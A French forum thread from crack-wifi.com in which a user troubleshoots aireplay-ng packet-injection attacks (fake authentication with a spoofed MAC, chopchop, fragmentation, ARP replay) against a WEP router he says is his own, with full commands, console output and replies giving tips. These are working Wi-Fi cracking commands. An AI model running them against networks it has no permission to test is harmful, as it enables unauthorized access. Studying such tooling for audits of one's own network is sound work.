Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-04-2012 12:42:26

kegilko
Membre
Inscription : 22-05-2010
Messages : 13

Problème lors des attaques aireplay, la commande ne s'arrète pas !

Bonjour !

J'ai voulu faire une démo à un amis ce matin sur la fiabilité du réseau (wep) via backtrack 5. J'ai voulu montré dans le cas ou aucune personne n'utilise le réseau (sans station donc) mais je bloque lors de l'étape où je dois procéder à une attaque avec aireplay-ng.
Le truc, c'est que la commande se lance bien, des paquets sont lus..Normalement il devrait s'arréter un moment et demander si je veux utiliser tel paquet mais non, il lit indéfiniement sans jamais s'arréter...et je ne comprend pas pourquoi xD

j'ai testé ces 3 attaques :

aireplay-ng -2 -p 0841 ... //trouvé dans un forum anglais

et les attaques chopchop et par fragmentation comme décrites sur ce tuto : http://www.crack-wifi.com/tutoriel-crac … tation.php

soit :

aireplay-ng -5 ... //chopchop

et

aireplay-ng -4 ... //frag

Il y a quelques mois, j'avais réussi à cracker mon réseau sans station, je ne me souviens plus avoir été bloqué à ce niveau-là..donc si quelqu'un a une explication et une solution, chui prenneur smile

thx !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-04-2012 13:31:23

kegilko
Membre
Inscription : 22-05-2010
Messages : 13

Re : Problème lors des attaques aireplay, la commande ne s'arrète pas !

J'ai retesté les manips, il s'averre que l'aireplay ne tourne pas en rond indéfiniment selon l'attaque choisie, je fait tourné l'attaque chopchop et par fragmentation pendant 100000 paquets (Read 100000 packets...).

Concernant l'attaque chopchop, je reçois des paquets de temps en temps, par contre ils n'ont jamais les bonnes adresses (jamais jamais, sur les 10/15 que j'ai reçus)

L'attaque par frag tourne sans jamais proposer de paquet.

Je vais tester avec aireplay-ng -2 -p 0841...

Me souviens pas avoir autant galéré il y a quelques mois, c'est zarb

Hors Ligne

#3 27-04-2012 16:39:30

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Problème lors des attaques aireplay, la commande ne s'arrète pas !

Ça donne quoi au niveau te ta fausse association?
As tu essayé une bonne vieille ré-injection d'ARP?
PS: c'est mieux si tu mets les commandes en entiers (le mieux étant de faire directement un copié collé de ce que tu as en console) au cas où il y ait un détail à régler.

Hors Ligne

#4 27-04-2012 20:00:00

Kratos96
Membre Actif
Inscription : 11-03-2012
Messages : 43

Re : Problème lors des attaques aireplay, la commande ne s'arrète pas !

J'ai le même problème que toi, moi sa vient du fait que la fausse association ne marche pas.
Verifie la tienne.

A+

Hors Ligne

#5 27-04-2012 21:01:26

kegilko
Membre
Inscription : 22-05-2010
Messages : 13

Re : Problème lors des attaques aireplay, la commande ne s'arrète pas !

Déjà, merci d'avoir répondu smile

Voici toutes les manipes que j'effectue depuis un dossier créé :

iwconfig

résultat :

lo          no wireless extensions

wlan1         IEEE 802.11bg ESSID:off/any
                 Mode:Managed Access Point: Not-Associated  Tx-Power=0 dBm
                 Retry long limit:7 RTS thr:off Fragment thr:off
                 Encryption key:off
                 Power Management:on

wlan0         IEEE 802.11bgn ESSID:off/any
                 Mode:Managed Access Point: Not-Associated  Tx-Power=14 dBm
                 Retry long limit:7 RTS thr:off Fragment thr:off
                 Encryption key:off
                 Power Management:on

eth0          no wireless extensions.

ensuite, je start ma clé wifi (alpha network), 

airmon-ng start wlan1
...
wlan1 ... (monitor mode enabled on mon0)
airodump-ng -w out -c 6 --bssid "@ de ma box" mon0

Voici le resultat : (je le fais depuis un autre ordi, donc je te recopie l'essentiel)

            
BSSID               PWR RXQ   Beacons #Data #/s CH   MB   ENC  CIPHER  AUTH             ESSID
"@ de ma box"       -55  90     17000     0   0  6  54e   WEP     WEP   OPN   "nom de ma box"  

J'ouvre un autre terminal : (en prenant soin de me repositionner dans le bon dossier)

aireplay-ng -1 30 -e "nom de ma box" -a "@ de ma box" -h 00:12:F0:6F:ED:38 mon0

00:12:F0:6F:ED:38 est choisis arbitrairement.

Le resultat semble ok...j'ai un truc bizzar, mais l'association reussie à priori (et je la voi dans le terminal airodump) :

The interface MAC (00:C0:CA:39:3A:79) doesn't match the specified MAC (-h).
           ifconfig mon0 hw ether 00:12:F0:6F:ED:38
Sending authentification request...
Authentification successful
Sending Association Request
Association successful :-) (AID: 1)

Et ça boucle toutes les 30 secondes avec succès.

Ensuite dans un autre terminal, je vais pour lancer la fameuse attaque (qui me bloque actuellement) :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "@ de ma box" -h 00:12:F0:6F:ED:38 mon0

Résultat : il boucle sans jamais retrouner de paquet à choisir, il y a denouveau la bizarerie dans l'affichage que je ne comprend pas, l'erreur vient effectivement de l'authentification à priori...

The interface MAC (00:C0:CA:39:3A:79) doesn't match the specified MAC (-h).
           ifconfig mon0 hw ether 00:12:F0:6F:ED:38
Read 46000 packets...

Le résultat est le meme si j'essai l'attaque par frag :

aireplay-ng -5 -a "@ de ma box" -b "@ de ma box" -h 00:12:F0:6F:ED:38 mon0

Suivant ton conseil, j'ai tenté l'injection arp :

aireplay-ng -3 -e "nom de ma box" -a "@ de ma box" -h 00:12:F0:6F:ED:38 mon0

et voici le résultat :

The interface MAC (00:C0:CA:39:3A:79) doesn't match the specified MAC (-h).
           ifconfig mon0 hw ether 00:12:F0:6F:ED:38
Waiting for beacons frame (ESSID: "nom de ma box") on channel 6
Found BSSID " "@ de ma box" " to given ESSID "nom de ma box".
Saving ARP request in replay_arp-0427-184023.cap
You should also start airodump-ng to capture replies.
Read 22000 packets (got 0 ARP requests and 31 ACKs), sent 0 packets...(0 pps)

l'attaque chopchop me renvoie des paquets rarement...mais qui n'ont jamais les bonnes adresses.

-> je viens de voir ta réponse Kratos96, et même si j'ai l'association semble OK il y a cette espece de message byzar...je pense que tu as mis le doigt au bon endroit...qu'en pensez vous ? j'ai du mal à comprendre l'erreur...

Dernière modification par kegilko (27-04-2012 21:04:40)

Hors Ligne

#6 29-04-2012 09:52:03

Cahaleen
Membre Radioactif
Lieu : Paris
Inscription : 02-03-2011
Messages : 96

Re : Problème lors des attaques aireplay, la commande ne s'arrète pas !

As-tu également testé l'injection? (aireplay -9)
Si l'injection ne fontionne pas, ça me semble déjà bien plus compliqué pour faire ton attaque wink


Si l'injection fonctionne :


Pour ma part dans ce cas j'ai un truc qui marche de temps en temps :
Tu lances l'attaque aireplay -2 et en même temps tu lances l'attaque -4 ou -5.
En général tu finis par pouvoir obtenir de quoi forger un paquet.
Et parfois avec de la chance, je fais tourner l'aireplay -3 en même temps et tout se déclenche!


Concernant ton authentification il n'y a pas de problème, le message que tu obtiens au début t'indique juste que l'adresse mac de ta carte wifi ne correspond pas à celle que tu as demandé d'utiliser. Le logiciel va donc lui attribuer le numéro que tu as demandé!

Dernière modification par Cahaleen (29-04-2012 09:54:35)

Hors Ligne

#7 29-04-2012 20:13:38

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Problème lors des attaques aireplay, la commande ne s'arrète pas !

BSSID               PWR RXQ   Beacons #Data #/s CH   MB   ENC  CIPHER  AUTH             ESSID
"@ de ma box"       -55  90     17000     0   0  6  54e   WEP     WEP   OPN   "nom de ma box" 

Le gros problème il est là: 0 paquets... la mort totale sur les ondes. Certains routeurs sont très bavards... le tiens non.
Tes conditions de réceptions sont bonnes, mais il y a 0 traffic, aucun paquet utilisables pour essayer quoique ce soit (il te faut au moins un data valable pour qu'une attaque puisse fonctionner)

Pour ce qui est du "truc bizarre", tu dois te réfèrer à ceci

The interface MAC (00:C0:CA:39:3A:79) doesn't match the specified MAC (-h).
           ifconfig mon0 hw ether 00:12:F0:6F:ED:38

aireplay-ng a lancé la comande "ifconfig mon0 hw ether 00:12:F0:6F:ED:38"
Ceci pour changer la mac de ton adaptateur afin qu'elle soit cohérente avec ta comande aireplay-ng (pour que la mac que tu as mis après -h dans ta ligne de commande soit la mac de ton adaptateur)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 152 04-12-2016 16:20:59 par pwerrick
8 220 26-11-2016 00:02:49 par koala
Problème reaver par Antho3674
4 301 15-11-2016 22:05:12 par kcdtv
3 337 14-08-2016 10:22:07 par MiscL
5 730 18-07-2016 23:13:58 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]